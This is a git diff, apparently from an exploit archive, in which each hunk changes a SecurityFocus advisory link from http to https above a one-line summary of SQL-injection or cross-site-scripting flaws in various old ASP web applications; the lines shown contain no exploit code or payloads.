http://www.securityfocus.com/bid/21039/info +source: https://www.securityfocus.com/bid/21039/info ASP Portal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28989.txt b/exploits/asp/webapps/28989.txt index 39a89d533..f681ae795 100644 --- a/exploits/asp/webapps/28989.txt +++ b/exploits/asp/webapps/28989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28990.txt b/exploits/asp/webapps/28990.txt index 0ce73072d..8c85d26f2 100644 --- a/exploits/asp/webapps/28990.txt +++ b/exploits/asp/webapps/28990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28991.txt b/exploits/asp/webapps/28991.txt index e1190b0fc..d977ca865 100644 --- a/exploits/asp/webapps/28991.txt +++ b/exploits/asp/webapps/28991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28992.txt b/exploits/asp/webapps/28992.txt index fc8cb84e4..bb9ccc6b0 100644 --- a/exploits/asp/webapps/28992.txt +++ b/exploits/asp/webapps/28992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28993.txt b/exploits/asp/webapps/28993.txt index b042766c8..6853cb119 100644 --- a/exploits/asp/webapps/28993.txt +++ b/exploits/asp/webapps/28993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28994.txt b/exploits/asp/webapps/28994.txt index d9453ffbb..9a97035d2 100644 --- a/exploits/asp/webapps/28994.txt +++ b/exploits/asp/webapps/28994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21043/info +source: https://www.securityfocus.com/bid/21043/info Infinicart is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29008.txt b/exploits/asp/webapps/29008.txt index b90e1878a..f90cb7d84 100644 --- a/exploits/asp/webapps/29008.txt +++ b/exploits/asp/webapps/29008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21055/info +source: https://www.securityfocus.com/bid/21055/info FunkyASP Glossary is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29009.txt b/exploits/asp/webapps/29009.txt index eadef6434..fcf4bbf56 100644 --- a/exploits/asp/webapps/29009.txt +++ b/exploits/asp/webapps/29009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21056/info +source: https://www.securityfocus.com/bid/21056/info SitesOutlet Ecommerce Kit is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29010.txt b/exploits/asp/webapps/29010.txt index 0b62d760e..ba2d87a41 100644 --- a/exploits/asp/webapps/29010.txt +++ b/exploits/asp/webapps/29010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21059/info +source: https://www.securityfocus.com/bid/21059/info SiteXpress E-Commerce System is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29011.txt b/exploits/asp/webapps/29011.txt index 728023636..442d80742 100644 --- a/exploits/asp/webapps/29011.txt +++ b/exploits/asp/webapps/29011.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21061/info +source: https://www.securityfocus.com/bid/21061/info ASPIntranet is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29012.txt b/exploits/asp/webapps/29012.txt index cedd21c80..b0886ca59 100644 --- a/exploits/asp/webapps/29012.txt +++ b/exploits/asp/webapps/29012.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21064/info +source: https://www.securityfocus.com/bid/21064/info DMXReady Site Engine Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29013.txt b/exploits/asp/webapps/29013.txt index c070dab00..8925c19f3 100644 --- a/exploits/asp/webapps/29013.txt +++ b/exploits/asp/webapps/29013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21065/info +source: https://www.securityfocus.com/bid/21065/info Pilot Cart is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29014.txt b/exploits/asp/webapps/29014.txt index 967ce64b8..d587e09de 100644 --- a/exploits/asp/webapps/29014.txt +++ b/exploits/asp/webapps/29014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21066/info +source: https://www.securityfocus.com/bid/21066/info Car Site Manager is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29015.txt b/exploits/asp/webapps/29015.txt index 44b7c2a2e..bca2ae427 100644 --- a/exploits/asp/webapps/29015.txt +++ b/exploits/asp/webapps/29015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21066/info +source: https://www.securityfocus.com/bid/21066/info Car Site Manager is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29016.txt b/exploits/asp/webapps/29016.txt index 35ae79874..9d361000c 100644 --- a/exploits/asp/webapps/29016.txt +++ b/exploits/asp/webapps/29016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21066/info +source: https://www.securityfocus.com/bid/21066/info Car Site Manager is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29024.txt b/exploits/asp/webapps/29024.txt index 4677e5b27..5749e063a 100644 --- a/exploits/asp/webapps/29024.txt +++ b/exploits/asp/webapps/29024.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21069/info +source: https://www.securityfocus.com/bid/21069/info Inventory Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29025.txt b/exploits/asp/webapps/29025.txt index 2f74919ef..c05517497 100644 --- a/exploits/asp/webapps/29025.txt +++ b/exploits/asp/webapps/29025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21070/info +source: https://www.securityfocus.com/bid/21070/info Evolve Merchant is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29028.txt b/exploits/asp/webapps/29028.txt index be945c1eb..72fde268d 100644 --- a/exploits/asp/webapps/29028.txt +++ b/exploits/asp/webapps/29028.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21073/info +source: https://www.securityfocus.com/bid/21073/info MGinternet Property Site Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29029.txt b/exploits/asp/webapps/29029.txt index 250016568..1a3f6fd4c 100644 --- a/exploits/asp/webapps/29029.txt +++ b/exploits/asp/webapps/29029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21073/info +source: https://www.securityfocus.com/bid/21073/info MGinternet Property Site Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29030.txt b/exploits/asp/webapps/29030.txt index 4db92857b..633bcf0d5 100644 --- a/exploits/asp/webapps/29030.txt +++ b/exploits/asp/webapps/29030.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21073/info +source: https://www.securityfocus.com/bid/21073/info MGinternet Property Site Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29031.txt b/exploits/asp/webapps/29031.txt index ff67947c0..da5dbced5 100644 --- a/exploits/asp/webapps/29031.txt +++ b/exploits/asp/webapps/29031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21073/info +source: https://www.securityfocus.com/bid/21073/info MGinternet Property Site Manager is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29037.txt b/exploits/asp/webapps/29037.txt index f2f157d4c..f2964d619 100644 --- a/exploits/asp/webapps/29037.txt +++ b/exploits/asp/webapps/29037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21090/info +source: https://www.securityfocus.com/bid/21090/info CandyPress Store is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29038.txt b/exploits/asp/webapps/29038.txt index 330f982eb..f9272aced 100644 --- a/exploits/asp/webapps/29038.txt +++ b/exploits/asp/webapps/29038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21090/info +source: https://www.securityfocus.com/bid/21090/info CandyPress Store is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29040.txt b/exploits/asp/webapps/29040.txt index 67b2ec6a8..19e16e664 100644 --- a/exploits/asp/webapps/29040.txt +++ b/exploits/asp/webapps/29040.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21093/info +source: https://www.securityfocus.com/bid/21093/info High Performance Computers Solutions Shopping Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29041.txt b/exploits/asp/webapps/29041.txt index 352c613b2..bdacb836f 100644 --- a/exploits/asp/webapps/29041.txt +++ b/exploits/asp/webapps/29041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21096/info +source: https://www.securityfocus.com/bid/21096/info Helm is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29042.txt b/exploits/asp/webapps/29042.txt index 57093b5ce..04cafe5e6 100644 --- a/exploits/asp/webapps/29042.txt +++ b/exploits/asp/webapps/29042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21098/info +source: https://www.securityfocus.com/bid/21098/info Dragon Event Listing is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29043.txt b/exploits/asp/webapps/29043.txt index a6e7286d8..06adf9a65 100644 --- a/exploits/asp/webapps/29043.txt +++ b/exploits/asp/webapps/29043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21098/info +source: https://www.securityfocus.com/bid/21098/info Dragon Event Listing is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29044.txt b/exploits/asp/webapps/29044.txt index 6f4d2ccd4..029b3af3f 100644 --- a/exploits/asp/webapps/29044.txt +++ b/exploits/asp/webapps/29044.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21098/info +source: https://www.securityfocus.com/bid/21098/info Dragon Event Listing is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29046.txt b/exploits/asp/webapps/29046.txt index e962dd395..aa601065f 100644 --- a/exploits/asp/webapps/29046.txt +++ b/exploits/asp/webapps/29046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21105/info +source: https://www.securityfocus.com/bid/21105/info ASPIntranet is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29048.txt b/exploits/asp/webapps/29048.txt index 2ab3d6181..ea3d379e4 100644 --- a/exploits/asp/webapps/29048.txt +++ b/exploits/asp/webapps/29048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21122/info +source: https://www.securityfocus.com/bid/21122/info The i-gallery application is prone to multiple-input validation vulnerabilities, including multiple cross-site scripting vulnerabilities and an HTML-injection issue, because the software fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29053.txt b/exploits/asp/webapps/29053.txt index f31a8b844..c8df40e6d 100644 --- a/exploits/asp/webapps/29053.txt +++ b/exploits/asp/webapps/29053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21131/info +source: https://www.securityfocus.com/bid/21131/info Image gallery with Access Database is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29054.txt b/exploits/asp/webapps/29054.txt index 6e6c48260..cdae6b976 100644 --- a/exploits/asp/webapps/29054.txt +++ b/exploits/asp/webapps/29054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21131/info +source: https://www.securityfocus.com/bid/21131/info Image gallery with Access Database is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29063.txt b/exploits/asp/webapps/29063.txt index 86750be28..018afe987 100644 --- a/exploits/asp/webapps/29063.txt +++ b/exploits/asp/webapps/29063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21138/info +source: https://www.securityfocus.com/bid/21138/info Xtreme ASP Photo Gallery is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues and an HTML-injection issue because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29064.txt b/exploits/asp/webapps/29064.txt index a29aafb44..606160ae4 100644 --- a/exploits/asp/webapps/29064.txt +++ b/exploits/asp/webapps/29064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21138/info +source: https://www.securityfocus.com/bid/21138/info Xtreme ASP Photo Gallery is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues and an HTML-injection issue because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29073.txt b/exploits/asp/webapps/29073.txt index 6fc31b5f7..4e6e5c59a 100644 --- a/exploits/asp/webapps/29073.txt +++ b/exploits/asp/webapps/29073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21152/info +source: https://www.securityfocus.com/bid/21152/info ASPCart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29074.txt b/exploits/asp/webapps/29074.txt index d2ca516ec..051d77e27 100644 --- a/exploits/asp/webapps/29074.txt +++ b/exploits/asp/webapps/29074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21153/info +source: https://www.securityfocus.com/bid/21153/info 20/20 Real Estate is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29075.txt b/exploits/asp/webapps/29075.txt index 9cc9d907b..165cc3130 100644 --- a/exploits/asp/webapps/29075.txt +++ b/exploits/asp/webapps/29075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21154/info +source: https://www.securityfocus.com/bid/21154/info 20/20 Auto Gallery is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29077.txt b/exploits/asp/webapps/29077.txt index ddbd5ea92..9d266fa83 100644 --- a/exploits/asp/webapps/29077.txt +++ b/exploits/asp/webapps/29077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21156/info +source: https://www.securityfocus.com/bid/21156/info 20/20 DataShed is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29078.txt b/exploits/asp/webapps/29078.txt index d981db4cc..bb1b909a2 100644 --- a/exploits/asp/webapps/29078.txt +++ b/exploits/asp/webapps/29078.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21156/info +source: https://www.securityfocus.com/bid/21156/info 20/20 DataShed is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29080.txt b/exploits/asp/webapps/29080.txt index 5c45cc111..5d875979c 100644 --- a/exploits/asp/webapps/29080.txt +++ b/exploits/asp/webapps/29080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21158/info +source: https://www.securityfocus.com/bid/21158/info BestWebApp Dating Site is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29081.txt b/exploits/asp/webapps/29081.txt index e71490ef2..7f897ad06 100644 --- a/exploits/asp/webapps/29081.txt +++ b/exploits/asp/webapps/29081.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21158/info +source: https://www.securityfocus.com/bid/21158/info BestWebApp Dating Site is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29084.txt b/exploits/asp/webapps/29084.txt index 74bb1c84d..f79f6c9e1 100644 --- a/exploits/asp/webapps/29084.txt +++ b/exploits/asp/webapps/29084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21166/info +source: https://www.securityfocus.com/bid/21166/info A-Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29085.txt b/exploits/asp/webapps/29085.txt index c874a9cc7..ad197efe5 100644 --- a/exploits/asp/webapps/29085.txt +++ b/exploits/asp/webapps/29085.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21166/info +source: https://www.securityfocus.com/bid/21166/info A-Cart is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29086.txt b/exploits/asp/webapps/29086.txt index 0fe02344e..7a22f7ca3 100644 --- a/exploits/asp/webapps/29086.txt +++ b/exploits/asp/webapps/29086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29087.txt b/exploits/asp/webapps/29087.txt index 081299c3a..9b3f4556a 100644 --- a/exploits/asp/webapps/29087.txt +++ b/exploits/asp/webapps/29087.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29088.txt b/exploits/asp/webapps/29088.txt index d33cb6a30..144812e20 100644 --- a/exploits/asp/webapps/29088.txt +++ b/exploits/asp/webapps/29088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29089.txt b/exploits/asp/webapps/29089.txt index 2a624e59f..cb13b76ff 100644 --- a/exploits/asp/webapps/29089.txt +++ b/exploits/asp/webapps/29089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29090.txt b/exploits/asp/webapps/29090.txt index 28cca864f..ff107d269 100644 --- a/exploits/asp/webapps/29090.txt +++ b/exploits/asp/webapps/29090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21167/info +source: https://www.securityfocus.com/bid/21167/info Active News Manger is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29093.txt b/exploits/asp/webapps/29093.txt index 29a2a614d..7fc6502e7 100644 --- a/exploits/asp/webapps/29093.txt +++ b/exploits/asp/webapps/29093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21168/info +source: https://www.securityfocus.com/bid/21168/info ClickTech Texas Rank'em is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29094.txt b/exploits/asp/webapps/29094.txt index a7f3247eb..3652665ed 100644 --- a/exploits/asp/webapps/29094.txt +++ b/exploits/asp/webapps/29094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21168/info +source: https://www.securityfocus.com/bid/21168/info ClickTech Texas Rank'em is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29103.txt b/exploits/asp/webapps/29103.txt index 9c411a262..984df8b6c 100644 --- a/exploits/asp/webapps/29103.txt +++ b/exploits/asp/webapps/29103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21190/info +source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29104.txt b/exploits/asp/webapps/29104.txt index f37fecc40..f1150e756 100644 --- a/exploits/asp/webapps/29104.txt +++ b/exploits/asp/webapps/29104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21190/info +source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29105.txt b/exploits/asp/webapps/29105.txt index 990edf153..6a87086b6 100644 --- a/exploits/asp/webapps/29105.txt +++ b/exploits/asp/webapps/29105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21190/info +source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29106.txt b/exploits/asp/webapps/29106.txt index 5747cafc2..555e34287 100644 --- a/exploits/asp/webapps/29106.txt +++ b/exploits/asp/webapps/29106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21190/info +source: https://www.securityfocus.com/bid/21190/info vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29107.txt b/exploits/asp/webapps/29107.txt index 800b18c5c..d04d0420b 100644 --- a/exploits/asp/webapps/29107.txt +++ b/exploits/asp/webapps/29107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29108.txt b/exploits/asp/webapps/29108.txt index b253dc402..a02cec3e5 100644 --- a/exploits/asp/webapps/29108.txt +++ b/exploits/asp/webapps/29108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29109.txt b/exploits/asp/webapps/29109.txt index 00ca902c0..6af841eae 100644 --- a/exploits/asp/webapps/29109.txt +++ b/exploits/asp/webapps/29109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29110.txt b/exploits/asp/webapps/29110.txt index d11bbb0fb..aa37ab3f9 100644 --- a/exploits/asp/webapps/29110.txt +++ b/exploits/asp/webapps/29110.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29111.txt b/exploits/asp/webapps/29111.txt index 1248f718c..4f2442f49 100644 --- a/exploits/asp/webapps/29111.txt +++ b/exploits/asp/webapps/29111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29112.txt b/exploits/asp/webapps/29112.txt index 71152e51f..9620add2b 100644 --- a/exploits/asp/webapps/29112.txt +++ b/exploits/asp/webapps/29112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29113.txt b/exploits/asp/webapps/29113.txt index 24c3d5f34..736ea33e9 100644 --- a/exploits/asp/webapps/29113.txt +++ b/exploits/asp/webapps/29113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29114.txt b/exploits/asp/webapps/29114.txt index b25fcb0f3..8b06a8cac 100644 --- a/exploits/asp/webapps/29114.txt +++ b/exploits/asp/webapps/29114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29115.txt b/exploits/asp/webapps/29115.txt index 3acfd8994..3c0127646 100644 --- a/exploits/asp/webapps/29115.txt +++ b/exploits/asp/webapps/29115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29116.txt b/exploits/asp/webapps/29116.txt index e9f426e9d..fb771340c 100644 --- a/exploits/asp/webapps/29116.txt +++ b/exploits/asp/webapps/29116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29117.txt b/exploits/asp/webapps/29117.txt index 8826bad13..6839bb87a 100644 --- a/exploits/asp/webapps/29117.txt +++ b/exploits/asp/webapps/29117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21191/info +source: https://www.securityfocus.com/bid/21191/info Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29118.txt b/exploits/asp/webapps/29118.txt index 55eac6297..231df4e3b 100644 --- a/exploits/asp/webapps/29118.txt +++ b/exploits/asp/webapps/29118.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21192/info +source: https://www.securityfocus.com/bid/21192/info eClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29119.txt b/exploits/asp/webapps/29119.txt index 68a1a5e87..dc27243ca 100644 --- a/exploits/asp/webapps/29119.txt +++ b/exploits/asp/webapps/29119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21192/info +source: https://www.securityfocus.com/bid/21192/info eClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29120.txt 